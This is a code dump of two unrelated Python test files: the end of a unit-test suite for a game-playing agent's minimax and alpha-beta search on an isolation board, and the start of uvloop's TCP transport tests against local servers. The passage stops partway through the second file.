class CounterBoard(isolation.Board):
"""Subclass of the isolation board that maintains counters for the number
of unique nodes and total nodes visited during depth first search.
Some functions from the base class must be overridden to maintain the
counters during search.
"""
def __init__(self, *args, **kwargs):
super(CounterBoard, self).__init__(*args, **kwargs)
self.counter = Counter()
self.visited = set()
self.root = None
def copy(self):
new_board = CounterBoard(self.__player_1__, self.__player_2__,
width=self.width, height=self.height)
new_board.move_count = self.move_count
new_board.__active_player__ = self.__active_player__
new_board.__inactive_player__ = self.__inactive_player__
new_board.__last_player_move__ = copy(self.__last_player_move__)
new_board.__player_symbols__ = copy(self.__player_symbols__)
new_board.__board_state__ = deepcopy(self.__board_state__)
new_board.counter = self.counter
new_board.visited = self.visited
new_board.root = self.root
return new_board
def forecast_move(self, move):
self.counter[move] += 1
self.visited.add(move)
new_board = self.copy()
new_board.apply_move(move)
if new_board.root is None:
new_board.root = move
return new_board
@property
def counts(self):
""" Return counts of (total, unique) nodes visited """
return sum(self.counter.values()), len(self.visited)
class Project1Test(unittest.TestCase):
def initAUT(self, depth, eval_fn, iterative=False,
method="minimax", loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.CustomPlayer(depth, eval_fn, iterative, method)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
@timeout(5)
# @unittest.skip("Skip eval function test.") # Uncomment this line to skip test
def test_heuristic(self):
""" Test output interface of heuristic score function interface."""
player1 = "Player1"
player2 = "Player2"
p1_location = (0, 0)
p2_location = (1, 1) # top left corner
game = isolation.Board(player1, player2)
game.apply_move(p1_location)
game.apply_move(p2_location)
self.assertIsInstance(game_agent.custom_score(game, player1), float,
"The heuristic function should return a floating point")
#timeout(5)
# @unittest.skip("Skip simple minimax test.") # Uncomment this line to skip test
def test_minimax_interface(self):
""" Test CustomPlayer.minimax interface with simple input """
h, w = 7, 7 # board size
test_depth = 1
starting_location = (5, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.minimax(next_state, test_depth)
self.assertTrue(type(v) == float,
("Minimax function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
#timeout(5)
# @unittest.skip("Skip alphabeta test.") # Uncomment this line to skip test
def test_alphabeta_interface(self):
""" Test CustomPlayer.alphabeta interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "alphabeta"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.alphabeta(next_state, test_depth)
self.assertTrue(type(v) == float,
("Alpha Beta function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip get_move test.") # Uncomment this line to skip test
def test_get_move_interface(self):
""" Test CustomPlayer.get_move interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
# Test that get_move returns a legal choice on an empty game board
board = isolation.Board(agentUT, 'null_agent', w, h)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on an " +
"empty board. It should return coordinates on the " +
"game board for the location of the agent's next " +
"move. The move must be one of the legal moves on " +
"the current game board."))
# Test that get_move returns a legal choice for first move as player 2
board = isolation.Board('null_agent', agentUT, w, h)
board.apply_move(starting_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed making the first " +
"move as player 2 on a new board. It should return " +
"coordinates on the game board for the location " +
"of the agent's next move. The move must be one " +
"of the legal moves on the current game board."))
# Test that get_move returns a legal choice after first move
board = isolation.Board(agentUT, 'null_agent', w, h)
board.apply_move(starting_location)
board.apply_move(adversary_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on a " +
"game in progress. It should return coordinates on" +
"the game board for the location of the agent's " +
"next move. The move must be one of the legal moves " +
"on the current game board."))
@timeout(5)
# @unittest.skip("Skip minimax test.") # Uncomment this line to skip test
def test_minimax(self):
""" Test CustomPlayer.minimax
This test uses a scoring function that returns a constant value based
on the location of the search agent on the board to force minimax to
choose a branch that visits those cells at a specific fixed-depth.
If minimax is working properly, it will visit a constant number of
nodes during the search and return one of the acceptable legal moves.
"""
h, w = 7, 7 # board size
starting_location = (2, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "minimax"
# The agent under test starts at position (2, 3) on the board, which
# gives eight (8) possible legal moves [(0, 2), (0, 4), (1, 1), (1, 5),
# (3, 1), (3, 5), (4, 2), (4, 4)]. The search function will pick one of
# those moves based on the estimated score for each branch. The value
# only changes on odd depths because even depths end on when the
# adversary has initiative.
value_table = [[0] * w for _ in range(h)]
value_table[1][5] = 1 # depth 1 & 2
value_table[4][3] = 2 # depth 3 & 4
value_table[6][6] = 3 # depth 5
heuristic = makeEvalTable(value_table)
# These moves are the branches that will lead to the cells in the value
# table for the search depths.
expected_moves = [set([(1, 5)]),
set([(3, 1), (3, 5)]),
set([(3, 5), (4, 2)])]
# Expected number of node expansions during search
counts = [(8, 8), (24, 10), (92, 27), (418, 32), (1650, 43)]
# Test fixed-depth search; note that odd depths mean that the searching
# player (student agent) has the last move, while even depths mean that
# the adversary has the last move before calling the heuristic
# evaluation function.
for idx in range(5):
test_depth = idx + 1
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.minimax(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, expected_moves[idx // 2], WRONG_MOVE.format(
method, test_depth, expected_moves[idx // 2], move))
@timeout(20)
# @unittest.skip("Skip alpha-beta test.") # Uncomment this line to skip test
def test_alphabeta(self):
""" Test CustomPlayer.alphabeta
This test uses a scoring function that returns a constant value based
on the branch being searched by alphabeta in the user agent, and forces
the search to prune on every other branch it visits. By using a huge
board where the players are too far apart to interact and every branch
has the same growth factor, the expansion and pruning must result in
an exact number of expanded nodes.
"""
h, w = 101, 101 # board size
starting_location = (50, 50)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "alphabeta"
# The agent under test starts in the middle of a huge board so that
# every branch has the same number of possible moves, so pruning any
# branch has the same effect during testing
# These are the expected number of node expansions for alphabeta search
# to explore the game tree to fixed depth. The custom eval function
# used for this test ensures that some branches must be pruned, while
# the search should still return an optimal move.
counts = [(8, 8), (17, 10), (74, 42), (139, 51), (540, 119)]
for idx in range(len(counts)):
test_depth = idx + 1 # pruning guarantee requires min depth of 3
first_branch = []
heuristic = makeBranchEval(first_branch)
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location,
w=w, h=h)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.alphabeta(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, first_branch, WRONG_MOVE.format(
method, test_depth, first_branch, move))
@timeout(20)
# @unittest.skip("Skip iterative deepening test.") # Uncomment this line to skip test
def test_get_move(self):
""" Test iterative deepening in CustomPlayer.get_move by placing an
agent on the game board and performing ID minimax search, which
should visit a specific number of unique nodes while expanding. By
forcing the search to timeout when a predetermined number of nodes
have been expanded, we can then verify that the expected number of
unique nodes have been visited.
"""
class DynamicTimer():
"""Dynamic Timer allows the time limit to be changed after the
timer is initialized so that the search timeout can be triggered
before the timer actually expires. This allows the timer to expire
when an event occurs, regardless of the clock time required until
the event happens.
"""
def __init__(self, time_limit):
self.time_limit = time_limit
self.start_time = curr_time_millis()
def time_left(self):
return self.time_limit - (curr_time_millis() - self.start_time)
w, h = 11, 11 # board size
adversary_location = (0, 0)
method = "minimax"
# The agent under test starts at the positions indicated below, and
# performs an iterative deepening minimax search (minimax is easier to
# test because it always visits all nodes in the game tree at every
# level).
origins = [(2, 3), (6, 6), (7, 4), (4, 2), (0, 5), (10, 10)]
exact_counts = [(8, 8), (32, 10), (160, 39), (603, 35), (1861, 54), (3912, 62)]
for idx in range(len(origins)):
# set the initial timer high enough that the search will not
# timeout before triggering the dynamic timer to halt by visiting
# the expected number of nodes
time_limit = 1e4
timer = DynamicTimer(time_limit)
eval_fn = makeEvalStop(exact_counts[idx][0], timer, time_limit)
agentUT, board = self.initAUT(-1, eval_fn, True, method,
origins[idx], adversary_location,
w, h)
legal_moves = board.get_legal_moves()
chosen_move = agentUT.get_move(board, legal_moves, timer.time_left)
diff_total = abs(board.counts[0] - exact_counts[idx][0])
diff_unique = abs(board.counts[1] - exact_counts[idx][1])
self.assertTrue(diff_total <= 1 and diff_unique == 0, ID_FAIL)
self.assertTrue(chosen_move in legal_moves, INVALID_MOVE.format(
legal_moves, chosen_move))
if __name__ == '__main__':
unittest.main()
|
test_tcp.py
|
import asyncio
import asyncio.sslproto
import gc
import os
import select
import socket
import unittest.mock
import ssl
import sys
import threading
import time
import weakref
from OpenSSL import SSL as openssl_ssl
from uvloop import _testbase as tb
SSL_HANDSHAKE_TIMEOUT = 15.0
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class _TestTCP:
def test_create_server_1(self):
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 5.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
data = await reader.readexactly(len(B_DATA))
self.assertEqual(data, B_DATA)
writer.writelines([b'S', b'P'])
writer.write(bytearray(b'A'))
writer.write(memoryview(b'M'))
if self.implementation == 'uvloop':
tr = writer.transport
sock = tr.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
await writer.drain()
writer.close()
CNT += 1
async def test_client(addr):
sock = socket.socket()
with sock:
sock.setblocking(False)
await self.loop.sock_connect(sock, addr)
await self.loop.sock_sendall(sock, A_DATA)
buf = b''
while len(buf) != 2:
buf += await self.loop.sock_recv(sock, 1)
self.assertEqual(buf, b'OK')
await self.loop.sock_sendall(sock, B_DATA)
buf = b''
while len(buf) != 4:
buf += await self.loop.sock_recv(sock, 1)
self.assertEqual(buf, b'SPAM')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(sock._io_refs, 0)
self.assertTrue(sock._closed)
async def start_server():
nonlocal CNT
CNT = 0
srv = await asyncio.start_server(
handle_client,
('127.0.0.1', 'localhost'), 0,
family=socket.AF_INET)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
self.assertTrue(srv.is_serving())
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
self.loop.call_soon(srv.close)
await srv.wait_closed()
# Check that the server cleaned-up proxy-sockets
for srv_sock in srv_socks:
self.assertEqual(srv_sock.fileno(), -1)
self.assertFalse(srv.is_serving())
async def start_server_sock():
nonlocal CNT
CNT = 0
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
srv = await asyncio.start_server(
handle_client,
None, None,
family=socket.AF_INET,
sock=sock)
self.assertIs(srv.get_loop(), self.loop)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
self.assertTrue(srv.is_serving())
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
srv.close()
await srv.wait_closed()
# Check that the server cleaned-up proxy-sockets
for srv_sock in srv_socks:
self.assertEqual(srv_sock.fileno(), -1)
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
self.loop.run_until_complete(start_server_sock())
self.assertEqual(CNT, TOTAL_CNT)
def test_create_server_2(self):
with self.assertRaisesRegex(ValueError, 'nor sock were specified'):
self.loop.run_until_complete(self.loop.create_server(object))
def test_create_server_3(self):
''' check ephemeral port can be used '''
async def start_server_ephemeral_ports():
for port_sentinel in [0, None]:
srv = await self.loop.create_server(
asyncio.Protocol,
'127.0.0.1', port_sentinel,
family=socket.AF_INET)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
self.assertTrue(srv.is_serving())
host, port = srv_socks[0].getsockname()
self.assertNotEqual(0, port)
self.loop.call_soon(srv.close)
await srv.wait_closed()
# Check that the server cleaned-up proxy-sockets
for srv_sock in srv_socks:
self.assertEqual(srv_sock.fileno(), -1)
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server_ephemeral_ports())
def test_create_server_4(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
with sock:
addr = sock.getsockname()
with self.assertRaisesRegex(OSError,
r"error while attempting.*\('127.*: "
r"address already in use"):
self.loop.run_until_complete(
self.loop.create_server(object, *addr))
def test_create_server_5(self):
# Test that create_server sets the TCP_IPV6ONLY flag,
# so it can bind to ipv4 and ipv6 addresses
# simultaneously.
port = tb.find_free_port()
async def runner():
srv = await self.loop.create_server(
asyncio.Protocol,
None, port)
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(runner())
def test_create_server_6(self):
if not hasattr(socket, 'SO_REUSEPORT'):
raise unittest.SkipTest(
'The system does not support SO_REUSEPORT')
port = tb.find_free_port()
async def runner():
srv1 = await self.loop.create_server(
asyncio.Protocol,
None, port,
reuse_port=True)
srv2 = await self.loop.create_server(
asyncio.Protocol,
None, port,
reuse_port=True)
srv1.close()
srv2.close()
await srv1.wait_closed()
await srv2.wait_closed()
self.loop.run_until_complete(runner())
def test_create_server_7(self):
# Test that create_server() stores a hard ref to the server object
# somewhere in the loop. In asyncio it so happens that
# loop.sock_accept() has a reference to the server object so it
# never gets GCed.
class Proto(asyncio.Protocol):
def connection_made(self, tr):
self.tr = tr
self.tr.write(b'hello')
async def test():
port = tb.find_free_port()
srv = await self.loop.create_server(Proto, '127.0.0.1', port)
wsrv = weakref.ref(srv)
del srv
gc.collect()
gc.collect()
gc.collect()
s = socket.socket(socket.AF_INET)
with s:
s.setblocking(False)
await self.loop.sock_connect(s, ('127.0.0.1', port))
d = await self.loop.sock_recv(s, 100)
self.assertEqual(d, b'hello')
srv = wsrv()
srv.close()
await srv.wait_closed()
del srv
# Let all transports shutdown.
await asyncio.sleep(0.1)
gc.collect()
gc.collect()
gc.collect()
self.assertIsNone(wsrv())
self.loop.run_until_complete(test())
def test_create_server_8(self):
with self.assertRaisesRegex(
ValueError, 'ssl_handshake_timeout is only meaningful'):
self.loop.run_until_complete(
self.loop.create_server(
lambda: None, host='::', port=0, ssl_handshake_timeout=10))
def test_create_server_9(self):
async def handle_client(reader, writer):
pass
async def start_server():
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
start_serving=False)
await srv.start_serving()
self.assertTrue(srv.is_serving())
# call start_serving again
await srv.start_serving()
self.assertTrue(srv.is_serving())
srv.close()
await srv.wait_closed()
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server())
def test_create_server_10(self):
async def handle_client(reader, writer):
pass
async def start_server():
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
start_serving=False)
async with srv:
fut = asyncio.ensure_future(srv.serve_forever())
await asyncio.sleep(0)
self.assertTrue(srv.is_serving())
fut.cancel()
with self.assertRaises(asyncio.CancelledError):
await fut
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server())
def test_create_connection_open_con_addr(self):
async def client(addr):
reader, writer = await asyncio.open_connection(*addr)
writer.write(b'AAAA')
self.assertEqual(await reader.readexactly(2), b'OK')
re = r'(a bytes-like object)|(must be byte-ish)'
with self.assertRaisesRegex(TypeError, re):
writer.write('AAAA')
writer.write(b'BBBB')
self.assertEqual(await reader.readexactly(4), b'SPAM')
if self.implementation == 'uvloop':
tr = writer.transport
sock = tr.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
writer.close()
await self.wait_closed(writer)
self._test_create_connection_1(client)
def test_create_connection_open_con_sock(self):
async def client(addr):
sock = socket.socket()
sock.connect(addr)
reader, writer = await asyncio.open_connection(sock=sock)
writer.write(b'AAAA')
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(b'BBBB')
self.assertEqual(await reader.readexactly(4), b'SPAM')
if self.implementation == 'uvloop':
tr = writer.transport
sock = tr.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
writer.close()
await self.wait_closed(writer)
self._test_create_connection_1(client)
def _test_create_connection_1(self, client):
CNT = 0
TOTAL_CNT = 100
def server(sock):
data = sock.recv_all(4)
self.assertEqual(data, b'AAAA')
sock.send(b'OK')
data = sock.recv_all(4)
self.assertEqual(data, b'BBBB')
sock.send(b'SPAM')
async def client_wrapper(addr):
await client(addr)
nonlocal CNT
CNT += 1
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
run(client_wrapper)
def test_create_connection_2(self):
sock = socket.socket()
with sock:
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
async def client():
reader, writer = await asyncio.open_connection(*addr)
writer.close()
await self.wait_closed(writer)
async def runner():
with self.assertRaises(ConnectionRefusedError):
await client()
self.loop.run_until_complete(runner())
def test_create_connection_3(self):
CNT = 0
TOTAL_CNT = 100
def server(sock):
data = sock.recv_all(4)
self.assertEqual(data, b'AAAA')
sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(*addr)
writer.write(b'AAAA')
with self.assertRaises(asyncio.IncompleteReadError):
await reader.readexactly(10)
writer.close()
await self.wait_closed(writer)
nonlocal CNT
CNT += 1
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
run(client)
def test_create_connection_4(self):
sock = socket.socket()
sock.close()
async def client():
reader, writer = await asyncio.open_connection(sock=sock)
writer.close()
await self.wait_closed(writer)
async def runner():
with self.assertRaisesRegex(OSError, 'Bad file'):
await client()
self.loop.run_until_complete(runner())
def test_create_connection_5(self):
def server(sock):
try:
data = sock.recv_all(4)
except ConnectionError:
return
self.assertEqual(data, b'AAAA')
sock.send(b'OK')
async def client(addr):
fut = asyncio.ensure_future(
self.loop.create_connection(asyncio.Protocol, *addr))
await asyncio.sleep(0)
fut.cancel()
with self.assertRaises(asyncio.CancelledError):
await fut
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_create_connection_6(self):
with self.assertRaisesRegex(
ValueError, 'ssl_handshake_timeout is only meaningful'):
self.loop.run_until_complete(
self.loop.create_connection(
lambda: None, host='::', port=0, ssl_handshake_timeout=10))
def test_transport_shutdown(self):
CNT = 0 # number of clients that were successful
TOTAL_CNT = 100 # total number of clients that test will create
TIMEOUT = 5.0 # timeout for this test
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(4)
self.assertEqual(data, b'AAAA')
writer.write(b'OK')
writer.write_eof()
writer.write_eof()
await writer.drain()
writer.close()
CNT += 1
async def test_client(addr):
reader, writer = await asyncio.open_connection(*addr)
writer.write(b'AAAA')
data = await reader.readexactly(2)
self.assertEqual(data, b'OK')
writer.close()
await self.wait_closed(writer)
async def start_server():
nonlocal CNT
CNT = 0
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
def test_tcp_handle_exception_in_connection_made(self):
# Test that if connection_made raises an exception,
# 'create_connection' still returns.
# Silence error logging
self.loop.set_exception_handler(lambda *args: None)
fut = asyncio.Future()
connection_lost_called = asyncio.Future()
async def server(reader, writer):
try:
await reader.read()
finally:
writer.close()
class Proto(asyncio.Protocol):
def connection_made(self, tr):
1 / 0
def connection_lost(self, exc):
connection_lost_called.set_result(exc)
srv = self.loop.run_until_complete(asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET))
async def runner():
tr, pr = await asyncio.wait_for(
self.loop.create_connection(
Proto, *srv.sockets[0].getsockname()),
timeout=1.0)
fut.set_result(None)
tr.close()
self.loop.run_until_complete(runner())
srv.close()
self.loop.run_until_complete(srv.wait_closed())
self.loop.run_until_complete(fut)
self.assertIsNone(
self.loop.run_until_complete(connection_lost_called))
def test_context_run_segfault(self):
is_new = False
done = self.loop.create_future()
def server(sock):
sock.sendall(b'hello')
class Protocol(asyncio.Protocol):
def __init__(self):
self.transport = None
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
try:
self = weakref.ref(self)
nonlocal is_new
if is_new:
done.set_result(data)
else:
is_new = True
new_proto = Protocol()
self().transport.set_protocol(new_proto)
new_proto.connection_made(self().transport)
new_proto.data_received(data)
except Exception as e:
done.set_exception(e)
async def test(addr):
await self.loop.create_connection(Protocol, *addr)
data = await done
self.assertEqual(data, b'hello')
with self.tcp_server(server) as srv:
self.loop.run_until_complete(test(srv.addr))
class Test_UV_TCP(_TestTCP, tb.UVTestCase):
def test_create_server_buffered_1(self):
SIZE = 123123
eof = False
fut = asyncio.Future()
class Proto(asyncio.BaseProtocol):
def connection_made(self, tr):
self.tr = tr
self.recvd = b''
self.data = bytearray(50)
self.buf = memoryview(self.data)
def get_buffer(self, sizehint):
return self.buf
def buffer_updated(self, nbytes):
self.recvd += self.buf[:nbytes]
if self.recvd == b'a' * SIZE:
self.tr.write(b'hello')
def eof_received(self):
nonlocal eof
eof = True
def connection_lost(self, exc):
fut.set_result(exc)
async def test():
port = tb.find_free_port()
srv = await self.loop.create_server(Proto, '127.0.0.1', port)
s = socket.socket(socket.AF_INET)
with s:
s.setblocking(False)
await self.loop.sock_connect(s, ('127.0.0.1', port))
await self.loop.sock_sendall(s, b'a' * SIZE)
d = await self.loop.sock_recv(s, 100)
self.assertEqual(d, b'hello')
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(test())
self.loop.run_until_complete(fut)
self.assertTrue(eof)
self.assertIsNone(fut.result())
def test_create_server_buffered_2(self):
class ProtoExc(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
1 / 0
def buffer_updated(self, nbytes):
pass
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
class ProtoZeroBuf1(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
return bytearray(0)
def buffer_updated(self, nbytes):
pass
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
class ProtoZeroBuf2(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
return memoryview(bytearray(0))
def buffer_updated(self, nbytes):
pass
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
class ProtoUpdatedError(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
return memoryview(bytearray(100))
def buffer_updated(self, nbytes):
raise RuntimeError('oups')
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
async def test(proto_factory, exc_type, exc_re):
port = tb.find_free_port()
proto = proto_factory()
srv = await self.loop.create_server(
lambda: proto, '127.0.0.1', port)
try:
s = socket.socket(socket.AF_INET)
with s:
s.setblocking(False)
await self.loop.sock_connect(s, ('127.0.0.1', port))
await self.loop.sock_sendall(s, b'a')
d = await self.loop.sock_recv(s, 100)
if not d:
raise ConnectionResetError
except ConnectionResetError:
pass
else:
self.fail("server didn't abort the connection")
return
finally:
srv.close()
await srv.wait_closed()
if proto._lost_exc is None:
self.fail("connection_lost() was not called")
return
with self.assertRaisesRegex(exc_type, exc_re):
raise proto._lost_exc
self.loop.set_exception_handler(lambda loop, ctx: None)
self.loop.run_until_complete(
test(ProtoExc, RuntimeError, 'unhandled error .* get_buffer'))
self.loop.run_until_complete(
test(ProtoZeroBuf1, RuntimeError, 'unhandled error .* get_buffer'))
self.loop.run_until_complete(
test(ProtoZeroBuf2, RuntimeError, 'unhandled error .* get_buffer'))
self.loop.run_until_complete(
test(ProtoUpdatedError, RuntimeError, r'^oups$'))
def test_transport_get_extra_info(self):
# This tests is only for uvloop. asyncio should pass it
# too in Python 3.6.
fut = asyncio.Future()
async def handle_client(reader, writer):
with self.assertRaises(asyncio.IncompleteReadError):
await reader.readexactly(4)
writer.close()
# Previously, when we used socket.fromfd to create a socket
# for UVTransports (to make get_extra_info() work), a duplicate
# of the socket was created, preventing UVTransport from being
# properly closed.
# This test ensures that server handle will receive an EOF
# and finish the request.
fut.set_result(None)
async def test_client(addr):
t, p = await self.loop.create_connection(
lambda: asyncio.Protocol(), *addr)
if hasattr(t, 'get_protocol'):
p2 = asyncio.Protocol()
self.assertIs(t.get_protocol(), p)
t.set_protocol(p2)
self.assertIs(t.get_protocol(), p2)
t.set_protocol(p)
self.assertFalse(t._paused)
self.assertTrue(t.is_reading())
t.pause_reading()
t.pause_reading() # Check that it's OK to call it 2nd time.
self.assertTrue(t._paused)
self.assertFalse(t.is_reading())
t.resume_reading()
t.resume_reading() # Check that it's OK to call it 2nd time.
self.assertFalse(t._paused)
self.assertTrue(t.is_reading())
sock = t.get_extra_info('socket')
self.assertIs(sock, t.get_extra_info('socket'))
sockname = sock.getsockname()
peername = sock.getpeername()
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.add_writer(sock.fileno(), lambda: None)
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.remove_writer(sock.fileno())
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.add_reader(sock.fileno(), lambda: None)
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.remove_reader(sock.fileno())
self.assertEqual(t.get_extra_info('sockname'),
sockname)
self.assertEqual(t.get_extra_info('peername'),
peername)
t.write(b'OK') # We want server to fail.
self.assertFalse(t._closing)
t.abort()
self.assertTrue(t._closing)
self.assertFalse(t.is_reading())
# Check that pause_reading and resume_reading don't raise
# errors if called after the transport is closed.
t.pause_reading()
t.resume_reading()
await fut
# Test that peername and sockname are available after
# the transport is closed.
self.assertEqual(t.get_extra_info('peername'),
peername)
self.assertEqual(t.get_extra_info('sockname'),
sockname)
async def start_server():
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET)
addr = srv.sockets[0].getsockname()
await test_client(addr)
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(start_server())
def test_create_server_float_backlog(self):
# asyncio spits out a warning we cannot suppress
async def runner(bl):
await self.loop.create_server(
asyncio.Protocol,
None, 0, backlog=bl)
